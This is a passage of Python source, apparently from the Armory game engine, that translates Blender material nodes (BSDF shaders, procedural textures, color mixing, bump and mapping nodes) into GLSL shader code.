global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
# clearcoar_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
curshader.add_function(c_functions.str_tex_noise)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
